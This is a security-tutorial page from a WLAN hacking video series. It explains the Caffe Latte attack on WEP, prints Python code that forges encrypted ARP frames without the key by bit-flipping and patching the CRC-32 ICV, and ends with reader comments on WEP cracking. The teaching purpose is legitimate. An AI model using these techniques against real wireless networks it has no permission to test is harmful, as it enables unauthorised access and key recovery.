Description: Welcome to Part 17 of the WLAN Security Megaprimer! Please start this series by watching Part 1 (http://www.securitytube.net/video/1756) if you have not done so already.
In this video we look at a demo of the infamous Caffe Latte attack. The basic idea is to turn WEP's message modification vulnerability to our advantage. We let the client associate with our fake access point. Once the client is connected, it sends out DHCP requests, which eventually time out; the client then falls back to an auto-configuration (169.254.x.x) address and sends out Gratuitous ARP packets for it.
The Caffe Latte attack captures these Gratuitous ARP packets and modifies them using the message modification flaw, turning them into ARP requests for the client's own IP address. Because the WEP ICV is a plain CRC-32, which is linear, the attacker can flip chosen bits in the encrypted frame and correct the encrypted ICV to match, all without knowing the key. The modified packets are replayed to the client, which sees that someone is asking for its MAC address and replies. The attacker's fake access point generates a few thousand of these spurious ARP requests per minute and collects the replies, each of which is a freshly encrypted WEP packet with a new IV. It is important to note that the attacker does this with no knowledge of the WEP key. Once enough packets have been collected, they are run through aircrack-ng to get the prize :)
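The message modification step described above, as an added toy reconstruction written for this page (it is not the video's code and not aircrack-ng's or airbase-ng's implementation). It builds a WEP-encrypted gratuitous ARP the way a client would, then, on the attacker side and without the key, XORs a chosen delta into the ciphertext and fixes the encrypted ICV using the affine property of CRC-32. The WEP key, IV, MAC addresses and the 169.254.x.y address are all constructed values; the delta only needs the client MAC, which is visible in the clear 802.11 header, and flips the sender IP blindly.

```python
"""Toy demonstration of WEP's message-modification flaw (the Caffe Latte step).
Example code for this page, not from aircrack-ng. All keys/addresses are constructed."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: WEP encrypts with RC4 keyed by IV || WEP key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV || RC4_{IV||key}(plaintext || ICV); ICV is CRC-32, little-endian."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes):
    """What the client does: decrypt and check the ICV. Returns (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    dec = rc4(iv + key, body)
    plaintext, icv = dec[:-4], dec[-4:]
    return plaintext, icv == struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def flip_wep_frame(frame: bytes, delta: bytes, fix_icv: bool = True) -> bytes:
    """Attacker side, no key needed: XOR delta into the encrypted payload and patch the
    encrypted ICV. CRC-32 is affine over GF(2):
        crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros(len(d)))
    so XORing crc(d) ^ crc(zeros) into the encrypted ICV keeps it valid."""
    iv, body = frame[:3], frame[3:]
    payload, icv = body[:-4], body[-4:]
    assert len(delta) == len(payload)
    new_payload = bytes(a ^ b for a, b in zip(payload, delta))
    if fix_icv:
        icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))) & 0xFFFFFFFF
        icv = bytes(a ^ b for a, b in zip(icv, struct.pack("<I", icv_delta)))
    return iv + new_payload + icv


# Constructed values for the demo.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP header, ethertype 0x0806
CLIENT_MAC = bytes.fromhex("001122334455")
ATTACKER_MAC = bytes.fromhex("00deadbeef00")
CLIENT_IP = bytes([169, 254, 17, 23])               # auto-configuration address


def gratuitous_arp(mac: bytes, ip: bytes) -> bytes:
    """Gratuitous ARP request as the client sends it: sender IP == target IP.
    Layout after the 8-byte LLC/SNAP header: htype, ptype, hlen, plen, op,
    sender MAC (offset 16), sender IP (22), target MAC (26), target IP (32)."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + mac + ip + bytes(6) + ip


def caffe_latte_delta(client_mac: bytes, attacker_mac: bytes, length: int) -> bytes:
    """Delta turning the gratuitous ARP into a request from attacker_mac for the client's IP.
    The sender MAC is rewritten (client MAC known from the clear header); one bit of the
    sender IP is flipped blindly so sender IP != target IP. The target IP is untouched."""
    d = bytearray(length)
    sender_mac_off = len(LLC_SNAP_ARP) + 8
    for i in range(6):
        d[sender_mac_off + i] = client_mac[i] ^ attacker_mac[i]
    d[sender_mac_off + 6 + 3] ^= 0x01    # last byte of sender IP
    return bytes(d)


def demo():
    """Returns what the client decrypts from the forged frame and whether its ICV passes."""
    key = bytes.fromhex("0102030405")    # constructed 40-bit WEP key; attacker never uses it
    iv = b"\x01\x02\x03"
    frame = wep_encrypt(key, iv, gratuitous_arp(CLIENT_MAC, CLIENT_IP))
    delta = caffe_latte_delta(CLIENT_MAC, ATTACKER_MAC, len(frame) - 3 - 4)
    forged = flip_wep_frame(frame, delta)
    return wep_decrypt(key, forged)


if __name__ == "__main__":
    plain, ok = demo()
    print("ICV valid:", ok, "sender MAC:", plain[16:22].hex(), "target IP:", list(plain[32:36]))
```

The client accepts the forged frame because the ICV still matches, and the ARP body now asks for the client's IP from a different MAC, so the client answers with an encrypted reply under a fresh IV. Running `flip_wep_frame` with `fix_icv=False` shows why the CRC fix-up matters: the same bit flips without the ICV correction are dropped on decryption.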
Here is a nifty lil video on Caffe Latte created by my friend Zero_Chaos a while back: http://www.securitytube.net/video/122
Tags: 802.11, WEP, Cracking, Aireplay-ng, ARP, replay, security, hacking, wireless, weak IV, Caffe Latte, Message Modification, XOR
thank you for posting another great video Vivek :)
BTW, Vivek. Your massive posting schedule has encouraged me to create one of my own. It took a while to find a subject you haven't covered. :)
It'll be called "Mitigating the Rogue DHCP Server"
Should be ready Thursday night.
Brilliant Vivek, thanks! I suspect you may well be a professor soon :-)
Excellent, watching it right away.
Great Work DUDE!!!
brilliant work actually :D
Thank You Vivek
heheh, again: http://vimeo.com/23222903 (3rd video today!!). Thanks a lot Vivek, I really appreciate all your hard work.
You always make great videos! Waiting for the next ones :)
Great explained like every other video of your megaprimer!
Go on Vivek!
Great Video....Thanks
Awesome vivek,
Thank You,
The last two videos have been in great detail, which is exactly what I like. I don't only want to know how (many YouTube videos show that, some rather badly!) but WHY and exactly what's happening "under the hood". I'll have to watch them a few more times, but if my initial impression is correct, the authentication was open. Can this be done if the authentication is set to PSK? Would the spoofed AP simply respond "yes, I know you are who you say you are, let's associate and then exchange data"?
@behrouz, m0ei, ahmadqdemat, luizfzs, 2IL060, Machinst, zidane Thanks a ton guys!
@Blackmarketeer I wanted to always :)
@Ignatius With WPA/WPA2 the situation is tricky; we will take it up in the next couple of videos :) so stay tuned!
Next video: Hirte Attack! posted :) Enjoy.
thanks for all the videos
I skipped ahead to the video that covered the WEP cracking because I'm currently involved in a project at college to find methods of cracking wireless networks and then securing these networks. I successfully cracked WEP using a tool called grimwepa in BackTrack and got the pass key, but I need to know if I can convert it back to the passphrase.
Correct me if I'm wrong, still learning.
Thanks for the videos, and I appreciate the hard work.
Thanks vivek! This is another attack to add to my arsenal. Your videos are an integral part of my developing Wifi Security and Hacking skills.
@silentkiller: grimwepa, huh? I ought to try that out. Thanks for putting me onto that. Usually I just ARP replay or use packetforge. Thanks.
Hi Vivek,
My question is about a fake AP using airbase-ng.
When a client connects to a fake AP, how does the fake AP send the reply to the client's ARP request?
If airbase-ng does not send any reply to ARP requests, can you suggest any other program like airbase-ng which sends these replies?
Thanks a ton in advance.
Thank you very much Vivek, don't stop!
I'm eager to get into PEAP exploits.
thanks thanks thanks